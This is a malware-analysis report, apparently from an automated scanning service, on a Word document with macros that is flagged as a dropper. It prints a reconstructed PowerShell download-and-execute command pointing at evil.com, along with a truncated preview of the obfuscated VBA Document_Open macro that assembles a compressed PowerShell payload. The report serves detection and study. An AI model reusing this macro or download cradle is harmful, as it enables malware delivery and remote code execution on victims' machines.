MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that triggers execution. This macro utilizes the Shell() function to launch a PowerShell command. The reconstructed PowerShell command is 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload')"', indicating it's designed to download and execute a second-stage payload from a remote URL. The ClamAV detection further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6606307-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6606307-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19716 bytes |
SHA-256: 6e97d5c80dc4106b09d4af8c23a8ae167f483e01f1b21b95eff045f99551ba76 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wVEzisYlZQXD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
YEvWA = 16041 / qXVCfO + UhBiSL - cdRpYb - 39254 / bukUdF + nRIEw - UMiWT * 26748 * AiWCo - 53250 * aijbjL * 4526 + bSKlkE
VOPBHR = 74680 / ENCot + ijBIo - kjXkW - 48155 / MLidNG + BoZapJ - NXTJOC * 6157 * ikbPkz - 77213 * iiifaH * 43313 + phvWuG
pYJHkR = 53946 / mDVLzw + YhrKwI - MiMBBR - 16774 / GbPAm + ouNEW - LqavjS * 57862 * BcWKYs - 23681 * vjQKVQ * 94693 + vwLTkn
ZZlVE = 32877 / jnjTi + EcuvJ - doMNut - 62564 / jGLrOw + lzHqa - NjWpzT * 79144 * URXaoA - 32365 * MqcXR * 72819 + coFfnT
bzBGRnPE ("" + SXJEaIWicjz + WzNzuwGdQFAjUh + juzSs + qEujo + jOoTu + jUPHqXz + JOpoRazAZnQOC)
EtAsnB = 44886 / iRrTkJ + otBjI - noXfi - 75753 / pWqjHn + wXFmp - XKWZGN * 83335 * wXMWF - 9816 * FcMFO * 56255 + IbKLw
End Sub
Attribute VB_Name = "QnOqWzcSwY"
Function juzSs()
On Error Resume Next
ULRTF = (pMQUcF - 33678) + 76396 - Zzvln / 11401 - dPoFEj - 73301 * Kbjzdk
nfTmH = 4123 * mEWzl + (50260 * IstclR / KaCwvc / qSitz) + 93201 + 21945 * 38157 * pszofj
owAKPIMNQwG = "pow" + athjbjOVBjZo + FwihCfznFanJAY + "er" + bOzKLuYC + ZjDCMnbdazu + "sh" + UlmnHvSi + rFKpZmL + "e" + fWFQkCNziXz + XGfZYHQHj + "ll " + iMzBwBqPZOXm + CkuwjKshch + "(N" + AOEJZvYW + FLAjjivAAT + "EW" + VWWKAnp + PwpBcKPpbOrn + "-" + ivCiKmchlsv + nOvljhoqOLiD + "O" + KYFZQrrnPzI + HiLzFjdbb + "BJE" + LFqoTkYanGS + TfBpAwzcBSh + "C" + OYTuEis + KADTfZhsH + "t " + jdainbciAJ + jQVzHsCj + "i" + FUAmjTY + KsiXkwlH + "O.S" + JcDXrXD + azFFIdYGhAv + "Tr"
EAcQz = (lBVlYd - 14059) + 50311 - wIPcJ / 96701 - JFmat - 22850 * DGiwzX
whwfRHjWoNz = "EAM" + ZKYYEOjcBDX + lSzMkrXiXz + "REa" + RfqhICwA + SlZQvYJYqohiU + "D" + mnLYwBKwPmjqvt + JrvzOmUvzV + "ER" + kcnKblVP + loHmJdMhOfq + "( " + nYQhATQZbC + nzYPKXlmh + "(" + rccrjRGT + EzlKDVvWCJ + " N" + YWdnSEH + qhRYFXcjIUj + "E" + jAnEGCpQiwWlE + wwCLOsNSU + "W" + zTpupBWfndzOzF + LkunBROj + "-"
fRvjv = (AslbdZ - 47405) + 54949 - dnaNRV / 37071 - AtULY - 31913 * AjrMt
YUAVh = (SIEWa - 70587) + 13336 - OYSkw / 68873 - GzjBh - 49453 * wjFFjW
VPnpTMUjqO = "OB" + oPGGvaDAZ + bSJJLhMwvnbd + "JE" + QauiMjzoXmw + XswturpoC + "Ct " + ffhCucMmiif + RNllnvXL + "IO" + oFwthlmnO + CjBuuuZLh + "." + smbjGEAGTPfMt + ifArrQRqPjjqtA + "CoM" + SjvNMSAfhmHPDX + zzMuLpsc + "p" + MzXOHGWQMczkiQ + KEJCmsMatu + "R" + ncrTmPG + TfBsnKrL + "e" + wPrfnTYJT + UMRTdjldzTJiMq + "s" + JzhUOjis + zEAOGmNLwSjZJa + "Si" + OwmkfoNLOKmS + iZijmhdjNWRAr + "O" + kpHOhRhFDR + pzvAudLkJucoY + "n.D" + jQTiwHniUiD + AUbPdrokRV + "efl" + jVOpMTqcmz + mLjBVbVqcpkp + "ATe"
KhQuS = 88838 + HQlYoH * NXjCi / dRHmOp / jtrlYW + 99262 - 16746 - Msfvn + (59416 / zchUKd)
ENdsoRz = "sTr" + LbksZdjduQNY + SHDELrX + "eaM" + wWJJhVp + lENuPQijLBBXQ + "(" + cOMHZuPJcYlWPU + ENZmvnXs + "[" + bfVifhwLjS + duWulWduTOMt + "I" + rkDprTUD + nusEXEnjwVki + "o." + CAOsCMS + VpNIrbpOZcnG + "m" + ZWObjvaaNVC + FbBFQMIWPJwvF + "EMO" + KBcuLWpV + mjKvcsGEkkmY + "RY" + uiHJNSjalT + sHcUPFNU + "sT" + zbnQqrVZUli + cOfIVEM + "RE" + fQAwcPUjLDsPk + wcpFMwdjmH + "aM]" + jzrPRkG + QrOFEnabNl + " " + IMtPGisCjOqc + jTnbiikAfkaA + "[Sy"
CFZWI = 44292 + kwzKCO * nCAmvU / HnlGN / IjJpGa + 64193 - 98687 - pUUnJw + (39350 / RcPrMd)
FnGuRn = 30442 + ZSEpKD * juJMjS / KFnzU / zGwCZB + 2833 - 74644 - EMBEZO + (83479 / iiNAjz)
uVJQRHmMcvX = "stE" + VzcBHSS + SWBQICoGpwLbst + "M" + IVHdOJsl + EJZwtjTcvVs + ".C" + KLcHGFccDJ + zLHiIdQtcwfhsD + "O" + PwzStzwS + ljuDAAi + "n" + XLunrcUtMjvODd + FLYFzOpw + "v"
PzlcH = 16806 + MzYDW * AHMrBP / fQQlJ / HZkEwz + 15311 - 60246 - jqjwWz + (59954 / SHYEN)
jzYziw = 90894 + EwVLG * YFklqn / CaqvoK / wJVzjz + 85916 - 40095 - PBwTw + (48247 / ruFij)
EGSJhZ = 65458 + qoCHv * XiGzEk / ktUld / zBibL + 12738 - 60218 - rOqLv + (75491 / KIQod)
RzCaOq = "e" + nOknzizTKB + tbEODOYVHCt + "rt]" + z
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.